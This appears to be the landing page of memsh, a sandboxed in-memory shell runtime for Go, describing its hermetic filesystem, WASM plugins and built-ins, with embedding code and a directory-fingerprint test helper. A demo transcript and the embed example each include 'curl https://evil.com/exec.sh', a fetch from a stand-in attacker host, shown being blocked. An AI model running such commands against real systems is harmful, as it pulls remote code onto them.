open source — sandboxed by default

A shell that touches nothing.

memsh is a hermetic, in-memory shell runtime for Go. Execute bash-like commands, run Python and JS, compose WASM plugins — all inside an isolated afero.MemMapFs. Zero real OS contact. Full observability. Embeds anywhere.

<1ms
Session spinup
0B
Real FS writes
Parallel sessions
memsh — agent session #a3f2
# process JSON — zero real OS contact
memsh $ echo '{"name":"alice","role":"admin"}' | jq -r .name
alice

# parse YAML config, output JSON
memsh $ yq -jc .database /config.yaml
{"host":"localhost","port":5432}

# combine built-ins and scripting
memsh $ ls -la /data | awk '{print $NF}' | sort
report.json
users.csv

# unknown commands are blocked by default
memsh $ curl https://evil.com/exec.sh
curl: command not found

memsh $

Three layers. One guarantee.

01
Hermetic FS
Every file operation goes through afero.MemMapFs. The real OS filesystem is completely invisible to plugins, scripts, and commands. Nothing leaks in or out.
02
WASM Isolation
Plugins run as WASM modules via wazero. Each invocation gets a fresh module instance. No shared linear memory. No OS syscalls. No escape path.
03
Full Observability
Every command is logged. Every FS write is tracked. Snapshot and restore any session state. Replay executions deterministically. Audit everything.

Built for production use.

Not a toy shell. A production-grade embedded runtime with the guarantees that real systems need.

Sub-millisecond spinup
A session is just a Go struct. No container provisioning, no process fork, no warm pool needed. Spin up isolated sessions with zero infrastructure overhead.
Performance
🔒
Hermetic filesystem
All file operations go through afero.MemMapFs. The real OS filesystem is completely invisible. Nothing leaks in or out. Perfect for testing and sandboxing.
Security
🧩
WASM plugin support
Extend with custom plugins compiled to WASM via wazero. Write in Go (GOOS=wasip1), Rust, or C. OS-agnostic, capability-declared, fully isolated.
Extensibility
🐚
Real bash semantics
Powered by mvdan.cc/sh/v3 — the same parser used by production Go tooling. Full shell syntax, pipes, redirects, and control flow.
Compatibility
📦
30+ built-in commands
ls, cat, grep, awk, find, sort, diff, chmod, and more — plus native plugins: jq, yq, lua, goja, base64, wc. Combined short flags work everywhere (-rf, -la, -jrc).
Convenience
🛡️
Command sandbox
External OS commands are blocked by default. Only registered builtins and plugins can run. Opt-in to external execution via WithAllowExternalCommands(true).
Security
🔌
Embeddable Go library
Drop into any Go application. Use functional options: WithFS, WithStdIO, WithCwd, WithEnv, WithPlugin, WithAllowExternalCommands.
API

WASM plugins. Real commands.

Author in TinyGo, Rust, or C. Distribute as a single .wasm file. OS-agnostic, version-pinned, capability-declared.

jq
Native Go · gojq
Full jq expression engine. Field selection, pipes, array iteration, -r, -c, -n. Reads from virtual FS files or stdin.
yq
Native Go · gojq + yaml.v3
YAML and JSON processing with jq syntax. YAML output by default, -j for JSON, -jc for compact JSON.
lua
Native Go · gopher-lua
Full Lua 5.1 interpreter. Inline -e, file execution, stdin. Access virtual FS via fs_readfile().
goja
Native Go · goja
ES2020+ JavaScript engine. Arrow functions, array methods, template literals. Access virtual FS via fs.readFile().
awk
Native Go · goawk
Full AWK interpreter. Pattern scanning, field extraction, -F delimiter, -f program file, NR/NF variables.
grep
Native Go
Regex search across virtual FS files. Combined flags -invcrl. Recursive directory search with -r.
find
Native Go
Walk the virtual filesystem. Filter by -name glob, -type f/d, -maxdepth.
base64 · wc
Native Go
Base64 encode/decode and word/line/byte counting. Plus custom WASM plugins via GOOS=wasip1.

Embed in minutes.

Embed
package main

import (
	"bytes"
	"context"
	"fmt"

	"github.com/amjadjibon/memsh/shell"
	"github.com/spf13/afero"
)

func main() {
	// pre-seed the virtual filesystem
	fs := afero.NewMemMapFs()
	afero.WriteFile(fs, "/config.yaml", []byte("host: localhost\nport: 5432\n"), 0644)

	// create a sandboxed shell session; stdout and stderr share one buffer
	var out bytes.Buffer
	sh, _ := shell.New(
		shell.WithFS(fs),
		shell.WithStdIO(nil, &out, &out),
	)
	defer sh.Close()

	// jq, yq, awk, grep, lua, goja — all sandboxed
	ctx := context.Background()
	sh.Run(ctx, `
yq -r .host /config.yaml
echo '{"users":["alice","bob"]}' | jq -r '.users[]'
curl https://evil.com   # blocked: command not found
`)

	// localhost\nalice\nbob
	fmt.Print(out.String())
}
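A check an embedder can put in their own test suite to confirm the hermetic-filesystem claim: fingerprint a real directory before and after a session and list every path that changed. This is an added example, not memsh code; `fingerprint` and `changed` are hypothetical helpers, and the workload closure is where the `sh.Run` call would go.

```go
package main

import (
	"crypto/sha256"
	"errors"
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
)

// fingerprint maps each path under root to its file type plus a content hash.
func fingerprint(root string) (map[string]string, error) {
	seen := map[string]string{}
	err := filepath.WalkDir(root, func(p string, d fs.DirEntry, err error) error {
		if err == nil && d.Type().IsRegular() {
			var data []byte
			data, err = os.ReadFile(p)
			seen[p] = fmt.Sprintf("file %x", sha256.Sum256(data))
		} else if err == nil {
			seen[p] = d.Type().String()
		}
		return err
	})
	return seen, err
}

// changed runs workload and lists real paths under root it created, modified or deleted.
func changed(root string, workload func()) ([]string, error) {
	before, errBefore := fingerprint(root)
	workload()
	after, errAfter := fingerprint(root)
	var diff []string
	for p, v := range after {
		if before[p] != v { // created or modified
			diff = append(diff, p)
		}
		delete(before, p)
	}
	for p := range before { // present before, gone afterwards
		diff = append(diff, p)
	}
	return diff, errors.Join(errBefore, errAfter)
}

func main() {
	// Stand-in workload: replace the empty closure with the session's sh.Run call.
	fmt.Println(changed(".", func() {}))
}
```

A hermetic session must return an empty list for every directory the host process can write to; symlink targets and permission bits are not compared in this version.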

What people build with it.

AI / Agents
Code Interpreter Backend
Safe execution environment for LLM-generated code. No containers, no VMs, sub-ms spinup.
DevOps
Shell Script Test Framework
Hermetic, parallel shell tests with pre-seeded fixtures. No temp dirs, no cleanup.
Platform Eng
GitOps Dry-run Engine
Run Terraform and Helm against a virtual FS. See the diff without touching real infra.
EdTech
Interactive Shell Tutorials
Real bash semantics, hermetic environment. Students can't break anything. No VM cost.
Compliance
Reproducible Audit Trails
Prove what ran, on what data, with what output. Session replay for regulatory submissions.
SRE
Executable Runbooks
Runbook steps that actually execute and verify. Alerts when a step starts failing before an incident.
Open source

Start building today.

MIT licensed. No vendor lock-in. Embed in any Go project in minutes.

$ go get github.com/amjadjibon/memsh